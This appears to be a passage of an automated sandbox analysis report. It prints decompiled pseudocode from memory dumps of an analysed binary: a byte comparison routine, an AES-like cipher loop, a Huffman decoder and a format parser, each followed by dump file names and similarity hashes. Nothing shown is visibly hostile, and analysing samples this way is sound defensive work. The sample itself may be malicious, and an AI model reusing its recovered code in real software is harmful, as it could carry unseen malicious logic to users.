          									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
          									if(_t228 != 0) {
          										goto L78;
          									}
          									goto L58;
          								}
          								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
          								if(_t293 == 0) {
          									L47:
          									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
          									if(_t295 == 0) {
          										L49:
          										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
          										if(_t297 == 0) {
          											L51:
          											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
          											if(_t228 != 0) {
          												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
          											}
          											goto L54;
          										}
          										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
          										if(_t228 != 0) {
          											goto L78;
          										}
          										goto L51;
          									}
          									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
          									if(_t228 != 0) {
          										goto L78;
          									}
          									goto L49;
          								}
          								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
          								if(_t228 != 0) {
          									goto L78;
          								}
          								goto L47;
          							}
          							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
          							if(_t299 == 0) {
          								L36:
          								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
          								if(_t301 == 0) {
          									L38:
          									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
          									if(_t303 == 0) {
          										L40:
          										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
          										if(_t228 != 0) {
          											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
          										}
          										goto L43;
          									}
          									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
          									if(_t228 != 0) {
          										goto L78;
          									}
          									goto L40;
          								}
          								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
          								if(_t228 != 0) {
          									goto L78;
          								}
          								goto L38;
          							}
          							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
          							if(_t228 != 0) {
          								goto L78;
          							}
          							goto L36;
          						}
          						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
          						if(_t305 == 0) {
          							L25:
          							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
          							if(_t307 == 0) {
          								L27:
          								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
          								if(_t309 == 0) {
          									L29:
          									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
          									if(_t228 != 0) {
          										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
          									}
          									goto L32;
          								}
          								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
          								if(_t228 != 0) {
          									goto L78;
          								}
          								goto L29;
          							}
          							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
          							if(_t228 != 0) {
          								goto L78;
          							}
          							goto L27;
          						}
          						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
          						if(_t228 != 0) {
          							goto L78;
          						}
          						goto L25;
          					}
          					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
          					if(_t311 == 0) {
          						L14:
          						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
          						if(_t313 == 0) {
          							L16:
          							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
          							if(_t315 == 0) {
          								L18:
          								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
          								if(_t228 != 0) {
          									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
          								}
          								goto L21;
          							}
          							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
          							if(_t228 != 0) {
          								goto L78;
          							}
          							goto L18;
          						}
          						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
          						if(_t228 != 0) {
          							goto L78;
          						}
          						goto L16;
          					}
          					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
          					if(_t228 != 0) {
          						goto L78;
          					}
          					goto L14;
          				}
          				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
          				if(_t317 == 0) {
          					L3:
          					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
          					if(_t319 == 0) {
          						L5:
          						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
          						if(_t321 == 0) {
          							L7:
          							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
          							if(_t228 != 0) {
          								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
          							}
          							goto L10;
          						}
          						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
          						if(_t228 != 0) {
          							goto L78;
          						}
          						goto L7;
          					}
          					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
          					if(_t228 != 0) {
          						goto L78;
          					}
          					goto L5;
          				}
          				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
          				if(_t228 != 0) {
          					goto L78;
          				}
          				goto L3;
          			}


          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
          • Instruction ID: 78f95c3b1431c769ab093f5c02bd1a636905ca7e0cf5ecfc95dfab4892d374ec
          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
          • Instruction Fuzzy Hash: 5AC1C9732552570AEFBD8A39C63113EBAA16AA17B131A077ED8B3CB9C6FE10C534D510
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001FDF12(void* __ebx, intOrPtr __ecx, void* __esi) {
          				void* _t222;
          				signed int _t229;
          				signed char _t253;
          				signed int _t301;
          				signed int* _t304;
          				signed int* _t309;
          				unsigned int _t313;
          				signed char _t348;
          				unsigned int _t350;
          				signed int _t353;
          				unsigned int _t356;
          				signed int* _t359;
          				signed int _t363;
          				signed int _t368;
          				signed int _t372;
          				signed int _t376;
          				signed char _t378;
          				signed int* _t382;
          				signed int _t388;
          				signed int _t394;
          				signed int _t399;
          				intOrPtr _t400;
          				signed char _t402;
          				signed char _t403;
          				signed char _t404;
          				unsigned int _t406;
          				signed int _t409;
          				signed int _t411;
          				unsigned int _t412;
          				unsigned int _t414;
          				unsigned int _t415;
          				signed int _t416;
          				signed int _t421;
          				void* _t422;
          				unsigned int _t423;
          				signed int _t426;
          				intOrPtr _t429;
          				signed int* _t430;
          				void* _t431;
          				void* _t432;
          
          				_t414 =  *(_t431 + 0x64);
          				_t429 = __ecx;
          				 *((intOrPtr*)(_t431 + 0x1c)) = __ecx;
          				if(_t414 != 0) {
          					_t415 = _t414 >> 4;
          					 *(_t431 + 0x64) = _t415;
          					if( *((char*)(__ecx)) == 0) {
          						 *((intOrPtr*)(_t431 + 0x30)) = __ecx + 8;
          						E0020EA80(_t431 + 0x54, __ecx + 8, 0x10);
          						_t432 = _t431 + 0xc;
          						if(_t415 == 0) {
          							L13:
          							return E0020EA80( *((intOrPtr*)(_t432 + 0x30)), _t432 + 0x50, 0x10);
          						}
          						_t399 =  *(_t432 + 0x60);
          						 *(_t432 + 0x1c) = _t399 + 8;
          						_t229 =  *(_t432 + 0x70);
          						_t400 = _t399 - _t229;
          						 *((intOrPtr*)(_t432 + 0x2c)) = _t400;
          						_t359 = _t229 + 8;
          						 *(_t432 + 0x20) = _t359;
          						do {
          							_t421 =  *(_t429 + 4);
          							 *(_t432 + 0x28) = _t359 + _t400 + 0xfffffff8;
          							E001FDEDF(_t432 + 0x4c, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
          							_t402 =  *(_t432 + 0x44);
          							 *(_t432 + 0x68) =  *(0x235350 + (_t402 & 0x000000ff) * 4) ^  *(0x235f50 + ( *(_t432 + 0x4b) & 0x000000ff) * 4) ^  *(0x235b50 + ( *(_t432 + 0x4e) & 0x000000ff) * 4);
          							_t348 =  *(_t432 + 0x50);
          							_t363 =  *(_t432 + 0x68) ^  *(0x235750 + (_t348 & 0x000000ff) * 4);
          							 *(_t432 + 0x68) = _t363;
          							 *(_t432 + 0x34) = _t363;
          							_t403 =  *(_t432 + 0x48);
          							_t368 =  *(0x235750 + (_t402 & 0x000000ff) * 4) ^  *(0x235350 + (_t403 & 0x000000ff) * 4) ^  *(0x235f50 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0x235b50 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
          							 *(_t432 + 0x70) = _t368;
          							 *(_t432 + 0x38) = _t368;
          							_t404 =  *(_t432 + 0x4c);
          							 *(_t432 + 0x10) =  *(0x235b50 + ( *(_t432 + 0x46) & 0x000000ff) * 4) ^  *(0x235750 + (_t403 & 0x000000ff) * 4);
          							_t372 =  *(_t432 + 0x10) ^  *(0x235350 + (_t404 & 0x000000ff) * 4) ^  *(0x235f50 + ( *(_t432 + 0x53) & 0x000000ff) * 4);
          							 *(_t432 + 0x10) = _t372;
          							 *(_t432 + 0x3c) = _t372;
          							 *(_t432 + 0x14) =  *(0x235f50 + ( *(_t432 + 0x47) & 0x000000ff) * 4) ^  *(0x235b50 + ( *(_t432 + 0x4a) & 0x000000ff) * 4);
          							_t376 =  *(_t432 + 0x14) ^  *(0x235750 + (_t404 & 0x000000ff) * 4) ^  *(0x235350 + (_t348 & 0x000000ff) * 4);
          							_t422 = _t421 - 1;
          							 *(_t432 + 0x14) = _t376;
          							 *(_t432 + 0x40) = _t376;
          							if(_t422 <= 1) {
          								goto L9;
          							}
          							_t416 =  *(_t432 + 0x68);
          							_t309 = (_t422 + 2 << 4) + _t429;
          							 *(_t432 + 0x14) = _t309;
          							_t430 = _t309;
          							 *((intOrPtr*)(_t432 + 0x18)) = _t422 - 1;
          							do {
          								_t411 =  *_t430;
          								 *(_t432 + 0x68) =  *(_t430 - 8) ^ _t416;
          								_t430 = _t430 - 0x10;
          								_t313 = _t430[5] ^ _t376;
          								_t412 = _t411 ^  *(_t432 + 0x10);
          								 *(_t432 + 0x14) = _t313;
          								_t356 = _t430[3] ^  *(_t432 + 0x70);
          								_t416 =  *(0x235750 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x235b50 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x235f50 + (_t356 >> 0x18) * 4) ^  *(0x235350 + ( *(_t432 + 0x68) & 0x000000ff) * 4);
          								 *(_t432 + 0x34) = _t416;
          								 *(_t432 + 0x70) =  *(0x235b50 + ( *(_t432 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x235f50 + (_t412 >> 0x18) * 4);
          								_t388 =  *(_t432 + 0x70) ^  *(0x235750 + ( *(_t432 + 0x68) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x235350 + (_t356 & 0x000000ff) * 4);
          								 *(_t432 + 0x70) = _t388;
          								 *(_t432 + 0x38) = _t388;
          								_t394 =  *(0x235f50 + ( *(_t432 + 0x14) >> 0x18) * 4) ^  *(0x235750 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x235b50 + ( *(_t432 + 0x68) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x235350 + (_t412 & 0x000000ff) * 4);
          								 *(_t432 + 0x10) = _t394;
          								 *(_t432 + 0x3c) = _t394;
          								_t376 =  *(0x235750 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x235b50 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x235f50 + ( *(_t432 + 0x68) >> 0x18) * 4) ^  *(0x235350 + ( *(_t432 + 0x14) & 0x000000ff) * 4);
          								_t135 = _t432 + 0x18;
          								 *_t135 =  *((intOrPtr*)(_t432 + 0x18)) - 1;
          								 *(_t432 + 0x40) = _t376;
          							} while ( *_t135 != 0);
          							_t429 =  *((intOrPtr*)(_t432 + 0x24));
          							 *(_t432 + 0x68) = _t416;
          							_t415 =  *(_t432 + 0x6c);
          							 *(_t432 + 0x14) = _t376;
          							L9:
          							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x68);
          							 *(_t432 + 0x6c) = _t253;
          							 *(_t432 + 0x44) = _t253;
          							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x14);
          							 *(_t432 + 0x34) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0x234230));
          							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x10);
          							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x70);
          							 *((char*)(_t432 + 0x35)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0x234230));
          							_t423 =  *(_t432 + 0x6c);
          							 *(_t432 + 0x4c) = _t406;
          							 *(_t432 + 0x48) = _t350;
          							 *((char*)(_t432 + 0x36)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0x234230));
          							 *(_t432 + 0x50) = _t378;
          							 *((char*)(_t432 + 0x37)) =  *((intOrPtr*)((_t350 >> 0x18) + 0x234230));
          							 *(_t432 + 0x38) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0x234230));
          							 *((char*)(_t432 + 0x39)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0x234230));
          							 *((char*)(_t432 + 0x3a)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0x234230));
          							_t170 = (_t406 >> 0x18) + 0x234230; // 0x54cbe9de
          							 *((char*)(_t432 + 0x3b)) =  *_t170;
          							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0x234230));
          							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0x234230));
          							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0x234230));
          							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t378 >> 0x18) + 0x234230));
          							 *(_t432 + 0x40) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0x234230));
          							_t409 =  *(_t432 + 0x34) ^  *(_t429 + 0x18);
          							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0x234230));
          							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0x234230));
          							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t423 >> 0x18) + 0x234230));
          							_t301 =  *(_t432 + 0x40) ^  *(_t429 + 0x24);
          							_t426 =  *(_t432 + 0x38) ^  *(_t429 + 0x1c);
          							_t353 =  *(_t432 + 0x3c) ^  *(_t429 + 0x20);
          							 *(_t432 + 0x6c) = _t301;
          							if( *((char*)(_t429 + 1)) != 0) {
          								_t409 = _t409 ^  *(_t432 + 0x54);
          								_t426 = _t426 ^  *(_t432 + 0x58);
          								_t353 = _t353 ^  *(_t432 + 0x5c);
          								 *(_t432 + 0x6c) = _t301 ^  *(_t432 + 0x60);
          							}
          							 *(_t432 + 0x54) =  *( *(_t432 + 0x28));
          							_t304 =  *(_t432 + 0x1c);
          							 *(_t432 + 0x58) =  *(_t304 - 4);
          							 *(_t432 + 0x5c) =  *_t304;
          							 *(_t432 + 0x60) = _t304[1];
          							_t382 =  *(_t432 + 0x20);
          							 *(_t432 + 0x1c) =  &(_t304[4]);
          							 *(_t382 - 8) = _t409;
          							_t382[1] =  *(_t432 + 0x6c);
          							_t400 =  *((intOrPtr*)(_t432 + 0x2c));
          							 *(_t382 - 4) = _t426;
          							 *_t382 = _t353;
          							_t359 =  &(_t382[4]);
          							_t415 = _t415 - 1;
          							 *(_t432 + 0x20) = _t359;
          							 *(_t432 + 0x6c) = _t415;
          						} while (_t415 != 0);
          						goto L13;
          					}
          					return E001FE3D4(__ecx,  *((intOrPtr*)(_t431 + 0x68)), _t415,  *((intOrPtr*)(_t431 + 0x68)));
          				}
          				return _t222;
          			}


          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 80b29d6e87d6c6c004d7e55adce4c0feac7c592af2012ebca37af43d25121c17
          • Instruction ID: e02c476ac5ad75be55a9b1bc1c6fc0e9c47f925eb7507651da52c197fe8a57bf
          • Opcode Fuzzy Hash: 80b29d6e87d6c6c004d7e55adce4c0feac7c592af2012ebca37af43d25121c17
          • Instruction Fuzzy Hash: E6E137755183948FC304CF29E89486BBBF0BB9A301F89099EF9D997352C335E915CB62
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 78%
          			E0020364E(void* __ecx, void* __edx) {
          				void* __edi;
          				signed int _t82;
          				signed int _t88;
          				signed int _t93;
          				signed int _t94;
          				signed int _t95;
          				signed int _t98;
          				signed int _t99;
          				intOrPtr _t116;
          				signed int _t127;
          				void* _t135;
          				signed int _t137;
          				signed int _t138;
          				signed int _t148;
          				signed int _t150;
          				void* _t152;
          				signed int _t155;
          				signed int _t156;
          				intOrPtr* _t157;
          				intOrPtr* _t166;
          				signed int _t169;
          				void* _t170;
          				signed int _t173;
          				void* _t178;
          				unsigned int _t180;
          				signed int _t183;
          				intOrPtr* _t184;
          				void* _t185;
          				signed int _t187;
          				signed int _t188;
          				intOrPtr* _t189;
          				signed int _t192;
          				signed int _t198;
          				void* _t201;
          
          				_t178 = __edx;
          				_t185 = __ecx;
          				_t184 = __ecx + 4;
          				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
          					L2:
          					E001FA4D1(_t184,  ~( *(_t185 + 8)) & 0x00000007);
          					_t82 = E001FA4E8(_t184);
          					_t205 = _t82 & 0x00008000;
          					if((_t82 & 0x00008000) == 0) {
          						_t137 = 0;
          						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
          						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
          						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
          						__eflags = _t82 & 0x00004000;
          						if((_t82 & 0x00004000) == 0) {
          							E0020E920(_t184, _t185 + 0xe4c8, 0, 0x194);
          							_t201 = _t201 + 0xc;
          						}
          						E001FA4D1(_t184, 2);
          						do {
          							 *(_t201 + 0x14) = E001FA4E8(_t184) >> 0x0000000c & 0x000000ff;
          							E001FA4D1(_t184, 4);
          							_t88 =  *(_t201 + 0x10);
          							__eflags = _t88 - 0xf;
          							if(_t88 != 0xf) {
          								 *(_t201 + _t137 + 0x14) = _t88;
          								goto L15;
          							}
          							_t187 = E001FA4E8(_t184) >> 0x0000000c & 0x000000ff;
          							E001FA4D1(_t184, 4);
          							__eflags = _t187;
          							if(_t187 != 0) {
          								_t188 = _t187 + 2;
          								__eflags = _t188;
          								while(1) {
          									_t188 = _t188 - 1;
          									__eflags = _t137 - 0x14;
          									if(_t137 >= 0x14) {
          										break;
          									}
          									 *(_t201 + _t137 + 0x14) = 0;
          									_t137 = _t137 + 1;
          									__eflags = _t188;
          									if(_t188 != 0) {
          										continue;
          									}
          									break;
          								}
          								_t137 = _t137 - 1;
          								goto L15;
          							}
          							 *(_t201 + _t137 + 0x14) = 0xf;
          							L15:
          							_t137 = _t137 + 1;
          							__eflags = _t137 - 0x14;
          						} while (_t137 < 0x14);
          						_push(0x14);
          						_t189 = _t185 + 0x3c50;
          						_push(_t189);
          						_push(_t201 + 0x1c);
          						E00202C88();
          						_t138 = 0;
          						__eflags = 0;
          						do {
          							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
          							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
          								L19:
          								_t93 = E001FA4ED(_t184);
          								_t94 =  *(_t189 + 0x84);
          								_t180 = _t93 & 0x0000fffe;
          								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
          								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
          									_t148 = 0xf;
          									_t95 = _t94 + 1;
          									 *(_t201 + 0x10) = _t148;
          									__eflags = _t95 - _t148;
          									if(_t95 >= _t148) {
          										L27:
          										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
          										 *_t184 =  *_t184 + (_t150 >> 3);
          										_t98 =  *(_t201 + 0x10);
          										 *(_t184 + 4) = _t150 & 0x00000007;
          										_t152 = 0x10;
          										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
          										__eflags = _t155 -  *_t189;
          										asm("sbb eax, eax");
          										_t99 = _t98 & _t155;
          										__eflags = _t99;
          										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
          										L28:
          										__eflags = _t156 - 0x10;
          										if(_t156 >= 0x10) {
          											__eflags = _t156 - 0x12;
          											if(__eflags >= 0) {
          												_t157 = _t184;
          												if(__eflags != 0) {
          													_t192 = (E001FA4E8(_t157) >> 9) + 0xb;
          													__eflags = _t192;
          													_push(7);
          												} else {
          													_t192 = (E001FA4E8(_t157) >> 0xd) + 3;
          													_push(3);
          												}
          												E001FA4D1(_t184);
          												while(1) {
          													_t192 = _t192 - 1;
          													__eflags = _t138 - 0x194;
          													if(_t138 >= 0x194) {
          														goto L46;
          													}
          													 *(_t201 + _t138 + 0x28) = 0;
          													_t138 = _t138 + 1;
          													__eflags = _t192;
          													if(_t192 != 0) {
          														continue;
          													}
          													L44:
          													_t189 = _t185 + 0x3c50;
          													goto L45;
          												}
          												break;
          											}
          											__eflags = _t156 - 0x10;
          											_t166 = _t184;
          											if(_t156 != 0x10) {
          												_t198 = (E001FA4E8(_t166) >> 9) + 0xb;
          												__eflags = _t198;
          												_push(7);
          											} else {
          												_t198 = (E001FA4E8(_t166) >> 0xd) + 3;
          												_push(3);
          											}
          											E001FA4D1(_t184);
          											__eflags = _t138;
          											if(_t138 == 0) {
          												L47:
          												_t116 = 0;
          												L49:
          												return _t116;
          											} else {
          												while(1) {
          													_t198 = _t198 - 1;
          													__eflags = _t138 - 0x194;
          													if(_t138 >= 0x194) {
          														goto L46;
          													}
          													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
          													_t138 = _t138 + 1;
          													__eflags = _t198;
          													if(_t198 != 0) {
          														continue;
          													}
          													goto L44;
          												}
          												break;
          											}
          										}
          										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
          										_t138 = _t138 + 1;
          										goto L45;
          									}
          									_t169 = 4 + _t95 * 4 + _t189;
          									__eflags = _t169;
          									while(1) {
          										__eflags = _t180 -  *_t169;
          										if(_t180 <  *_t169) {
          											break;
          										}
          										_t95 = _t95 + 1;
          										_t169 = _t169 + 4;
          										__eflags = _t95 - 0xf;
          										if(_t95 < 0xf) {
          											continue;
          										}
          										goto L27;
          									}
          									 *(_t201 + 0x10) = _t95;
          									goto L27;
          								}
          								_t170 = 0x10;
          								_t183 = _t180 >> _t170 - _t94;
          								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
          								 *_t184 =  *_t184 + (_t173 >> 3);
          								 *(_t184 + 4) = _t173 & 0x00000007;
          								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
          								goto L28;
          							}
          							_t127 = E00204393(_t185);
          							__eflags = _t127;
          							if(_t127 == 0) {
          								goto L47;
          							}
          							goto L19;
          							L45:
          							__eflags = _t138 - 0x194;
          						} while (_t138 < 0x194);
          						L46:
          						 *((char*)(_t185 + 0xe661)) = 1;
          						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
          						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
          							_push(0x12b);
          							_push(_t185 + 0xa0);
          							_push(_t201 + 0x30);
          							E00202C88();
          							_push(0x3c);
          							_push(_t185 + 0xf8c);
          							_push(_t201 + 0x15b);
          							E00202C88();
          							_push(0x11);
          							_push(_t185 + 0x1e78);
          							_push(_t201 + 0x197);
          							E00202C88();
          							_push(0x1c);
          							_push(_t185 + 0x2d64);
          							_push(_t201 + 0x1a8);
          							E00202C88();
          							E0020EA80(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
          							_t116 = 1;
          							goto L49;
          						}
          						goto L47;
          					}
          					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
          					_push(_t185 + 0xe4c4);
          					_push(_t185);
          					return E00202435(_t185 + 0x98d8, _t178, _t205);
          				}
          				_t135 = E00204393(__ecx);
          				if(_t135 != 0) {
          					goto L2;
          				}
          				return _t135;
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
          • Instruction ID: 27d2ec65e037bac7dfdfe4196e8e3e722c4bcfede76fdf5b03a5edff839451fb
          • Opcode Fuzzy Hash: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
          • Instruction Fuzzy Hash: 389136F021434A8BDB24EF68C895BBEB3DDAF50300F54492DE696872C3DBB4A664C751
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 86%
          			E00213EE9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
          				signed int _v8;
          				signed int _v12;
          				signed int _v16;
          				signed int _t52;
          				signed int _t54;
          				signed int _t55;
          				void* _t56;
          				signed int _t57;
          				signed char _t60;
          				signed char _t62;
          				signed int _t64;
          				void* _t65;
          				signed int _t66;
          				signed char _t75;
          				signed char _t78;
          				void* _t86;
          				void* _t88;
          				signed char _t90;
          				signed char _t92;
          				signed int _t93;
          				signed int _t95;
          				signed int _t97;
          				signed int _t98;
          				signed int _t102;
          				signed int* _t103;
          				void* _t105;
          				signed int _t111;
          				unsigned int _t113;
          				signed char _t115;
          				void* _t123;
          				unsigned int _t124;
          				void* _t125;
          				signed int _t126;
          				short _t127;
          				void* _t130;
          				void* _t132;
          				void* _t134;
          				signed int _t135;
          				void* _t136;
          				void* _t138;
          				void* _t139;
          
          				_t125 = __edi;
          				_t52 =  *0x22d668; // 0x4319796a
          				_v8 = _t52 ^ _t135;
          				_t134 = __ecx;
          				_t102 = 0;
          				_t123 = 0x41;
          				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
          				_t105 = 0x58;
          				_t138 = _t54 - 0x64;
          				if(_t138 > 0) {
          					__eflags = _t54 - 0x70;
          					if(__eflags > 0) {
          						_t55 = _t54 - 0x73;
          						__eflags = _t55;
          						if(_t55 == 0) {
          							L9:
          							_t56 = E0021491B(_t134);
          							L10:
          							if(_t56 != 0) {
          								__eflags =  *((intOrPtr*)(_t134 + 0x30)) - _t102;
          								if( *((intOrPtr*)(_t134 + 0x30)) != _t102) {
          									L71:
          									_t57 = 1;
          									L72:
          									return E0020E203(_t57, _v8 ^ _t135);
          								}
          								_t124 =  *(_t134 + 0x20);
          								_push(_t125);
          								_v16 = _t102;
          								_t60 = _t124 >> 4;
          								_v12 = _t102;
          								_t126 = 0x20;
          								__eflags = 1 & _t60;
          								if((1 & _t60) == 0) {
          									L46:
          									_t111 =  *(_t134 + 0x32) & 0x0000ffff;
          									__eflags = _t111 - 0x78;
          									if(_t111 == 0x78) {
          										L48:
          										_t62 = _t124 >> 5;
          										__eflags = _t62 & 0x00000001;
          										if((_t62 & 0x00000001) == 0) {
          											L50:
          											__eflags = 0;
          											L51:
          											__eflags = _t111 - 0x61;
          											if(_t111 == 0x61) {
          												L54:
          												_t64 = 1;
          												L55:
